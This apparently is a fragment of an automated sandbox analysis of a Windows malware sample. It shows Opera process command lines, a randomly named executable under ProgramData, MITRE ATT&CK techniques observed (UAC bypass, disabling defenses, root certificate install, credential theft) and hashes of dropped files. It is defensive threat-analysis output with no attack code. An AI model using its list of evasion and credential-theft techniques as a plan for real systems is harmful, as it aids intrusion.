--with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=on --ab_tests=GROW-2836-test-1:GROW-2836 --field-trial-handle=2740,i,15032688372832037905,2802880698792572888,262144 --variations-seed-version --mojo-platform-channel-handle=3472 /prefetch:82⤵PID:9140
-
C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --enable-quic --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-cities=on --with-feature:address-bar-keywords-monetization=on --with-feature:amazon-new-ids=on --with-feature:amp-requests-stats=on --with-feature:aria-command-line-in-extension=on --with-feature:aria-command-line-react=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-maker-studio-integration=on --with-feature:gaming-api=on --with-feature:lucid-mode-hide-text=on --with-feature:native-crypto-wallet=on --with-feature:opera-startpage-special=on --with-feature:password-generator=off --with-feature:premium-valve-in=on --with-feature:proxy-switcher-ui-default-visible=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:shopping-corner=on --with-feature:sitecheck-age=on --with-feature:specific-keywords=on --with-feature:startpage-opening-animation=off --with-feature:startpage-sync-banner=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=on --ab_tests=GROW-2836-test-1:GROW-2836 --field-trial-handle=2752,i,15032688372832037905,2802880698792572888,262144 --variations-seed-version --mojo-platform-channel-handle=3584 /prefetch:82⤵PID:9012
-
C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe" --type=renderer --no-appcompat-clear --start-stack-profiler --with-feature:cashback-assistant=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-cities=on --with-feature:address-bar-keywords-monetization=on --with-feature:amazon-new-ids=on --with-feature:amp-requests-stats=on --with-feature:aria-command-line-in-extension=on --with-feature:aria-command-line-react=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-maker-studio-integration=on --with-feature:gaming-api=on --with-feature:lucid-mode-hide-text=on --with-feature:native-crypto-wallet=on --with-feature:opera-startpage-special=on --with-feature:password-generator=off --with-feature:premium-valve-in=on --with-feature:proxy-switcher-ui-default-visible=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:shopping-corner=on --with-feature:sitecheck-age=on --with-feature:specific-keywords=on --with-feature:startpage-opening-animation=off --with-feature:startpage-sync-banner=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=on --ab_tests=GROW-2836-test-1:GROW-2836 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --field-trial-handle=3012,i,15032688372832037905,2802880698792572888,262144 --variations-seed-version --mojo-platform-channel-handle=3704 /prefetch:12⤵PID:3744
-
C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe" --type=renderer --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-cities=on --with-feature:address-bar-keywords-monetization=on --with-feature:amazon-new-ids=on --with-feature:amp-requests-stats=on --with-feature:aria-command-line-in-extension=on --with-feature:aria-command-line-react=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-maker-studio-integration=on --with-feature:gaming-api=on --with-feature:lucid-mode-hide-text=on --with-feature:native-crypto-wallet=on --with-feature:opera-startpage-special=on --with-feature:password-generator=off --with-feature:premium-valve-in=on --with-feature:proxy-switcher-ui-default-visible=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:shopping-corner=on --with-feature:sitecheck-age=on --with-feature:specific-keywords=on --with-feature:startpage-opening-animation=off --with-feature:startpage-sync-banner=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=on --ab_tests=GROW-2836-test-1:GROW-2836 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --field-trial-handle=3020,i,15032688372832037905,2802880698792572888,262144 --variations-seed-version --mojo-platform-channel-handle=3816 /prefetch:12⤵PID:4876
-
C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe" --type=renderer --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-cities=on --with-feature:address-bar-keywords-monetization=on --with-feature:amazon-new-ids=on --with-feature:amp-requests-stats=on --with-feature:aria-command-line-in-extension=on --with-feature:aria-command-line-react=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-maker-studio-integration=on --with-feature:gaming-api=on --with-feature:lucid-mode-hide-text=on --with-feature:native-crypto-wallet=on --with-feature:opera-startpage-special=on --with-feature:password-generator=off --with-feature:premium-valve-in=on --with-feature:proxy-switcher-ui-default-visible=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:shopping-corner=on --with-feature:sitecheck-age=on --with-feature:specific-keywords=on --with-feature:startpage-opening-animation=off --with-feature:startpage-sync-banner=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=on --ab_tests=GROW-2836-test-1:GROW-2836 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --field-trial-handle=4120,i,15032688372832037905,2802880698792572888,262144 --variations-seed-version --mojo-platform-channel-handle=4252 /prefetch:12⤵PID:6996
-
C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe" --type=renderer --extension-process --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-cities=on --with-feature:address-bar-keywords-monetization=on --with-feature:amazon-new-ids=on --with-feature:amp-requests-stats=on --with-feature:aria-command-line-in-extension=on --with-feature:aria-command-line-react=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-maker-studio-integration=on --with-feature:gaming-api=on --with-feature:lucid-mode-hide-text=on --with-feature:native-crypto-wallet=on --with-feature:opera-startpage-special=on --with-feature:password-generator=off --with-feature:premium-valve-in=on --with-feature:proxy-switcher-ui-default-visible=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:shopping-corner=on --with-feature:sitecheck-age=on --with-feature:specific-keywords=on --with-feature:startpage-opening-animation=off --with-feature:startpage-sync-banner=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=on --ab_tests=GROW-2836-test-1:GROW-2836 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --field-trial-handle=4196,i,15032688372832037905,2802880698792572888,262144 --variations-seed-version --mojo-platform-channel-handle=4288 /prefetch:22⤵PID:6580
-
C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe" --type=renderer --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-cities=on --with-feature:address-bar-keywords-monetization=on --with-feature:amazon-new-ids=on --with-feature:amp-requests-stats=on --with-feature:aria-command-line-in-extension=on --with-feature:aria-command-line-react=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-maker-studio-integration=on --with-feature:gaming-api=on --with-feature:lucid-mode-hide-text=on --with-feature:native-crypto-wallet=on --with-feature:opera-startpage-special=on --with-feature:password-generator=off --with-feature:premium-valve-in=on --with-feature:proxy-switcher-ui-default-visible=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:shopping-corner=on --with-feature:sitecheck-age=on --with-feature:specific-keywords=on --with-feature:startpage-opening-animation=off --with-feature:startpage-sync-banner=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=on --ab_tests=GROW-2836-test-1:GROW-2836 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --field-trial-handle=4228,i,15032688372832037905,2802880698792572888,262144 --variations-seed-version --mojo-platform-channel-handle=4388 /prefetch:12⤵PID:4436
-
C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe" --type=renderer --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-cities=on --with-feature:address-bar-keywords-monetization=on --with-feature:amazon-new-ids=on --with-feature:amp-requests-stats=on --with-feature:aria-command-line-in-extension=on --with-feature:aria-command-line-react=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-maker-studio-integration=on --with-feature:gaming-api=on --with-feature:lucid-mode-hide-text=on --with-feature:native-crypto-wallet=on --with-feature:opera-startpage-special=on --with-feature:password-generator=off --with-feature:premium-valve-in=on --with-feature:proxy-switcher-ui-default-visible=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:shopping-corner=on --with-feature:sitecheck-age=on --with-feature:specific-keywords=on --with-feature:startpage-opening-animation=off --with-feature:startpage-sync-banner=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=on --ab_tests=GROW-2836-test-1:GROW-2836 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --field-trial-handle=4420,i,15032688372832037905,2802880698792572888,262144 --variations-seed-version --mojo-platform-channel-handle=3460 /prefetch:12⤵PID:7792
-
C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe" --type=renderer --extension-process --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-cities=on --with-feature:address-bar-keywords-monetization=on --with-feature:amazon-new-ids=on --with-feature:amp-requests-stats=on --with-feature:aria-command-line-in-extension=on --with-feature:aria-command-line-react=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-maker-studio-integration=on --with-feature:gaming-api=on --with-feature:lucid-mode-hide-text=on --with-feature:native-crypto-wallet=on --with-feature:opera-startpage-special=on --with-feature:password-generator=off --with-feature:premium-valve-in=on --with-feature:proxy-switcher-ui-default-visible=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:shopping-corner=on --with-feature:sitecheck-age=on --with-feature:specific-keywords=on --with-feature:startpage-opening-animation=off --with-feature:startpage-sync-banner=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=on --ab_tests=GROW-2836-test-1:GROW-2836 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=4504,i,15032688372832037905,2802880698792572888,262144 --variations-seed-version --mojo-platform-channel-handle=3592 /prefetch:22⤵PID:2380
-
C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --enable-quic --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-cities=on --with-feature:address-bar-keywords-monetization=on --with-feature:amazon-new-ids=on --with-feature:amp-requests-stats=on --with-feature:aria-command-line-in-extension=on --with-feature:aria-command-line-react=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-maker-studio-integration=on --with-feature:gaming-api=on --with-feature:lucid-mode-hide-text=on --with-feature:native-crypto-wallet=on --with-feature:opera-startpage-special=on --with-feature:password-generator=off --with-feature:premium-valve-in=on --with-feature:proxy-switcher-ui-default-visible=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:shopping-corner=on --with-feature:sitecheck-age=on --with-feature:specific-keywords=on --with-feature:startpage-opening-animation=off --with-feature:startpage-sync-banner=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=on --ab_tests=GROW-2836-test-1:GROW-2836 --field-trial-handle=4744,i,15032688372832037905,2802880698792572888,262144 --variations-seed-version --mojo-platform-channel-handle=4696 /prefetch:82⤵PID:6384
-
C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe" --show-intro-overlay --start-maximized --lowered-browser1⤵PID:2548
-
C:\Users\Admin\AppData\Local\Programs\Opera\109.0.5097.59\opera_crashreporter.exeC:\Users\Admin\AppData\Local\Programs\Opera\109.0.5097.59\opera_crashreporter.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win64 --annotation=prod=OperaDesktop --annotation=ver=109.0.5097.59 --initial-client-data=0x288,0x28c,0x290,0x284,0x294,0x7ffa3c2c0650,0x7ffa3c2c0660,0x7ffa3c2c06702⤵PID:6476
-
C:\ProgramData\ndfbaljqaqzm\dckuybanmlgp.exeC:\ProgramData\ndfbaljqaqzm\dckuybanmlgp.exe1⤵PID:7064
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
3Registry Run Keys / Startup Folder
3Create or Modify System Process
4Windows Service
4Event Triggered Execution
1Change Default File Association
1Scheduled Task/Job
1Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Boot or Logon Autostart Execution
3Registry Run Keys / Startup Folder
3Create or Modify System Process
4Windows Service
4Event Triggered Execution
1Change Default File Association
1Scheduled Task/Job
1Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Impair Defenses
5Disable or Modify System Firewall
1Disable or Modify Tools
3Modify Registry
10Subvert Trust Controls
1Install Root Certificate
1Virtualization/Sandbox Evasion
2Credential Access
Unsecured Credentials
6Credentials In Files
5Credentials in Registry
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2.0MB
MD57a294852ac57150df0a6443412915b90
SHA1a41019a9671d521b84bc1227148ac584c9c904a9
SHA25675143fd2d3b7f53652d68739ee1fb3a1e772184150cec2ca1ababa95428d750f
SHA51227763d0edaf270876f63eedc11e6f4e7afa82a583a35ef771502710da7d4ae3a6da1f5a3e5fbd1908416021aaa9ea91d69ff6d9a373634268f4d0a2efc49f61e
-
Filesize
2.0MB
MD53ccbebad6ac948dbc3cbb21dc739c850
SHA1cf2eacf708e2a89ae26cde312f39cbc9433a16e5
SHA256564e4f09e92f85c3b8d8c600937745840909ad2553b427aa86f663a265e4ee6a
SHA512f2046033aa0f9bcbf8ff5029c2ac27e51de4d9fcd220d4d52e6889dbc0c8958c42f274f7c7b5a3d307ff072a3a75183f53b69eae6b167248240a1eda104b8a27
-
Filesize
4.3MB
MD5f80109a582e68b9748aec0de5d00a904
SHA1fd3f14169c5d4e735ca904a39df530904afc8272
SHA2560f8245266d778f3349eb12e63606c649424f586918e4ccc884b7917cf5ae4d86
SHA512b9fb48d780676c79c5643bc832d65738dd9579a73ae9763bf56824d1eec2f2cb20c68e4d1b7696d8bb7a7bbb4a0deee6e5490cd1946d1f0cddb713ae3c750248
-
Filesize
1.9MB
MD5adc0c82e7080b39062f2d588fd38c6b2
SHA1fb0ed6ad478264c27f815accc58c38ef90064d31
SHA2566debd3076e9d1f38e8f291f1c96f38242f1ad4de92a56b8a89031da362dcf00a
SHA512a124b9a2b11461d1a3c7de06ae36989967cf647f6ee9c0b3225dd00867953ca45ec1c3b698d426ceb490a8dbddb8370d5e9ca17bfe630e80945f4f614a51580e
-
Filesize
4KB
MD56b1f6c38b707eb5763caf1a307ac2e33
SHA1411c4e6a3da47dbb47bfcd43668dfe2ae08035aa
SHA256073056a00f64f1a2d32df3ea585833f597694d052caec6471777677775f9bff4
SHA512ae5abeead863034b26774c9122ef07264f801e7bdaec6e09775586383cf78e18cffa1eda05799244b4a9e8dbce21450284801d331d47b8f1036a1e7083e51c45
-
Filesize
593KB
MD5c8fd9be83bc728cc04beffafc2907fe9
SHA195ab9f701e0024cedfbd312bcfe4e726744c4f2e
SHA256ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a
SHA512fbb446f4a27ef510e616caad52945d6c9cc1fd063812c41947e579ec2b54df57c6dc46237ded80fca5847f38cbe1747a6c66a13e2c8c19c664a72be35eb8b040
-
Filesize
1.1MB
MD53143cd8f56bf599b3cfddaf9152d445d
SHA133b83cd5d719be2acd908834ce7336d805b35c6a
SHA2565f4a7d44b849b744b38f11fbb131743324c84705ec16ae7a1f0789f4f35e49c2
SHA5127f2066faa7f687aa984d26837106f6fd09028cc37877906ba1a9a5bb6ea4adc7ad791fee77bac1abcb97916c08eab347c0804f3d8ed3b338fef1b933a1759fdd
-
Filesize
40B
MD58f3843a9da63a7c396a894b5865b2f67
SHA12e7f9776d1ba8b15aea00d84eff977929ed70022
SHA25676841dc7ebcb954ee1442bff5ef2356159574207e77f9b74b5303d298980b26a
SHA51206c417f3f8a5010105ced178e9d478c82253cc2ffb08135827ea8a5b905101b684d532d7f6cd776adce49200d4e719242bf44b88311c5d3f7ccdb6bbcba200ba
-
Filesize
336B
MD59cecd0c272d8ab5d38bd0a034db9364c
SHA17bf3456dfd910a6182a0ded63bcd9b04fa07f6d7
SHA256761765be0fd4fe59f84e3400998811bbd9b125da0d85cc2ebc8ff4d4861b8ab2
SHA5124b82d139dd13ca4d377dfbe252eba082ae8a9e2989cb1f714a0e7d84e94d3d24d38e34b6e43b36de35570764422a6757c9ea153ffdf9368003acef6c4d8ae898
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\es\messages.json
Filesize151B
MD5bd6b60b18aee6aaeb83b35c68fb48d88
SHA19b977a5fbf606d1104894e025e51ac28b56137c3
SHA256b7b119625387857b257dd3f4b20238cdbe6c25808a427f0110bcb0bf86729e55
SHA5123500b42b17142cd222bc4aa55bf32d719dbd5715ff8d0924f1d75aec4bc6aa8e9ca8435f0b831c73a65cc1593552b9037489294fbf677ba4e1cec1173853e45b
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\manifest.json
Filesize758B
MD5b6fbb72ac3f9b9838942adbb90dafc98
SHA1804f2111292c3051c4c91d527279706d33044745
SHA256e9405d2b0eaa6bb94d97c2aebdf688a67f739af1f54de3d4fff9593eb09e5fae
SHA5124cac05e1151c3ef0214202336c5ba095a0abc44499b4faba83e8696e9cf4d2706c1079dd8d99aaf312a25c2ed2b87fdc8adbc217814a304c999b6db14b6a6e42
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\_locales\en_GB\messages.json
Filesize187B
MD52a1e12a4811892d95962998e184399d8
SHA155b0ae8a7b5a5d6094827ede8e6a1d26d4b4a720
SHA25632b4406692c26b540fea815a9bb56df1f164140cd849e8025930b7425036cceb
SHA512bb54d5e8684a6bfeac559b7c7a7551eed6a8a43a4c6464218cb0adb1c89fea124b69760690c3124af86fa68ac3fdbe903eaa098f0af2b6a58f4702c803abc089
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\_locales\fa\messages.json
Filesize136B
MD5238d2612f510ea51d0d3eaa09e7136b1
SHA10953540c6c2fd928dd03b38c43f6e8541e1a0328
SHA256801162df89a8ad2b1a51de75e86eba3958b12960660960a5ffafe9bc55bc293e
SHA5122630dd7a3c17dc963b1a71d81295cf22f8b3838748b55c433318e1e22f5b143a6d374ca2e5a8420659fa130200fbaa4814d0f093b1eca244b5635a3b99878e1c
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\_locales\pt_BR\messages.json
Filesize150B
MD50b1cf3deab325f8987f2ee31c6afc8ea
SHA16a51537cef82143d3d768759b21598542d683904
SHA2560ec437af3f59fef30355cf803966a2b9a0cd9323d390297496f750775995a6bf
SHA5125bc1f5a2d38f4a071513e2ac25b241c8e5584bed8d77e7fc4194855898d51a328dd73200f5aae6c9bc1b2a304e40e56bc686192074bd8a1bcc98f4971dee428f
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\odclajchhopeklkiekamigakopnkflom\1.0.6_0\_locales\bg\messages.json
Filesize388B
MD5df7ef80fd2913cccb36a73e1c3b2feea
SHA13d099cda438341b15ec5f0a6d277d69dbd6d9d52
SHA2560b82c89540c9f086fdda31bd43fe2578c0db45989d27408a073d29f161385e1d
SHA51220212d4c864f9d202e74b4b1fbbd6a29f4b3f93010f51021b3ea8e3735ba6cebf259193ddcb9ac37e7e67326ffbcb70385293ee6c465e282e8ebc92bb09cfd40
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\odclajchhopeklkiekamigakopnkflom\1.0.6_0\_locales\de\messages.json
Filesize203B
MD5493955cfd99ecc2e47c9da4130ef577b
SHA1c19f0091748ccceabc3e3800f381e742c0f48089
SHA2563fcddf7bfec7f84ad727ede5e62105489f73b5d2804a31ce262291dd60492e9c
SHA512ba93f3139bf291c5eed59f2ef3a98e989c8c6795568fe5ba6c8b9fe7a342e2338a398edd063e7a3b81f9dfb92294cc38cb13ed32f2a3c44cbcaf202bda40913c
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\odclajchhopeklkiekamigakopnkflom\1.0.6_0\_metadata\verified_contents.json
Filesize6KB
MD5742cdc96c4a38c18331d8ed7bdd2d82b
SHA1d9842a3de25e57ceac1370cd4d531557e4462915
SHA256ccfa6e59121b2ce5317e5edf1a7791953b307c74024095a36d450644976b4519
SHA512031f79c8f12e77d1386a2d5a87155c9fa02aa88f3c0310cf8a5aa7ea3a768c0c7899c1a823881e5c40e6480e335b867a6b5dee7cee8b03c417882e235f0f0713
-
Filesize
371B
MD50bc9cf726d1c15fbb234f1eaac10782b
SHA1f3dc77eb3f2a5f17f4f30f6214f26a5d263c9a75
SHA256baf115a08a7ecf49f581911f92a357140b2a2aa730a652174d89d68003fefdd7
SHA5129f3c38482e7598456e41193d59edea368f53811e235fb609a65d5f565387c8ce937327976ff990d04af3a6cb9960e075322279dc821feeb1e34db4f77a48fb78
-
Filesize
10KB
MD5b8e9db6fe340c2c0ea9c9c6db5632f5a
SHA10308aa12765eb2e75ccd52bdbd466bb81dafbeed
SHA256b3093ffebcda3fa9dc940d1377f54ce46d91045586d1a75c5356d741b366cdf4
SHA512fddfcf2d9b8d9abd8e4fa8ffa214aaaf30b1e3cc1c88c16c6a67b7fea59ec6010814f2782aca3c0e3d1d659c451daf838385d1da5ee3859558b7836b7c1ea243
-
Filesize
6KB
MD5d57862a7b4e1dee036e49a0ab70ef946
SHA1e69a66a7082eee5735c424cc964bd2989b5334b8
SHA2564893d8252941ded349869cdd52eb9fe9f6d29f5384ac1bd67c1e1785fa8571c9
SHA5121593083cce040a0ef845820db48fe0580cc2b817deb2e938a3644f76ec4a84a2de5c10d470a48cf6a421c722b1b97e986613111bcdb46082c899dddf130b334b
-
Filesize
12KB
MD5f72e5939f0fa7115880eda6a7b3ebe57
SHA1612b09fb72eeae38063632ffcd661979bec41728
SHA2568148e792fe061dcd09fcbd8db884d33be8683618cfad8b8b439f40037f789768
SHA512ab1e301dafa0fd7b2a7c733d58519676d9df54d3478b891eb6c6a8a5fb16e2532c1484de33156fb430f41cc7d3d8212c47410e5e969f629566511fc1d769efd7
-
Filesize
7KB
MD5b29ae0fc359285f83087eb449df4cd25
SHA1b5fdb0074ffc1df773a40b1b827f2d7b4890bcd1
SHA25652e14aa09b0fda3db060dc5bfb87e56fb2cc2f60ed9898d39a3de7f2114fa67c
SHA5127ce14d2d6ba0f2fe5c89fc86a681100fba6266d83d3b8c51ab82f28a9c04a65d1ab09f75e9503d142b673a02fd6548152ce2f69204925b5eee5d65917d151157
-
Filesize
7KB
MD5ca9ff799dc46bc46c4847bb89dc3ca77
SHA16d97859e60e4ac22564a26ab574b4344ada23a80
SHA25603e724eca95f1ec06afd14994ab83f03cba20b84e8d65257e4ef85e939c3bcf8
SHA51283bceb4ab5832c87f73e7431dff630de70d6af70c0d1d34a696a4eb2fe3b78316928a7bc0e2d0627c4f9bfa89841e261b17a57c78baa40f6ffee87daafe33e3c
-
Filesize
15KB
MD58a9d4709f279dda2ffa2a494e3784dca
SHA1ad80535a453cafb1a361e07ca7bcb2a7c41e1bdf
SHA256a52f33d0f26cbf764b1ddc8a7b050d7021d0ba76db52e3a92f1107428838badd
SHA5127b29fcd12c79a602a9f338870fc8500813c98af3e0998950d716ee5d86fd370cb35c7f26cffa16988519d622dc463718a42a04de3eb9dd8983bae158621b7a1e
-
Filesize
21KB
MD5cf8412417eb253281aef67590c42da40
SHA1061fa85069ae16244e660caa4533ef795fbada8b
SHA256731ce4543cea0422d9de57f05a6d534a07c6893e9e2b70633aed5f2dcc118e21
SHA512a444a64002d5a9ff544d27d790c6e3df7c25864d8bd7b4c04041186ad6ca7d622a416f90043885d6849284f2667cb126ab3b37e41ae09833bbe263762a86738f
-
Filesize
41KB
MD5e59cf2d983da9099f1252f7e57c6b6c9
SHA1c70b29faf4fa8642dbd9afba467c154a480afdc4
SHA25677b06cbf426a26146026fcd6aed360f195c17b2108a3b5d4a543cd7fb06f0fcd
SHA512b4ec97ea132f39816527f1f7137046be1bf394227116b1a0732734eb168df16b8ce339509a4525e48d7dcf1026fa123f4eb22af6c1596377fef265e94068fda3
-
Filesize
24KB
MD5dbe456e7a46b0674f6382525a1f94882
SHA1a0d16724c4789a0214400b6b4619d851a4a91daa
SHA25647cc1fcad233a00d725344e17c267f31cb0757f517f04c596d7d10c61120bc02
SHA512d20b4d2450924adc7e97ffcff6f53251931d0a1c67e76933c4815641e0ae25a3d038c0a26341d3b02b2fbec610685491fbf2d6c3477311306af898b251fc3f98
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\cc565207-e54a-4919-88f1-2965d80c0090.tmp
Filesize15KB
MD593375136b654316481e5df05151bb247
SHA1b1a1389cd1229491d96ec5b8396c5e2c4326c3a3
SHA2569c561dbbba1b7c361905c5656a2c4f73cf0622e2a60eeec2a8654cb2112efb44
SHA512ea9c7f7164ac743dd24d10cc3b0195ecc0e951e60b332ef8d9e16aa02b2a6edcf892628fd9de5f27e36fd886e771d431651e379b7b1316a7db603fb21e50119a
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\f9127597-a310-4559-a977-c757dbd7f1d5.tmp
Filesize1B
MD55058f1af8388633f609cadb75a75dc9d
SHA13a52ce780950d4d969792a2559cd519d7ee8c727
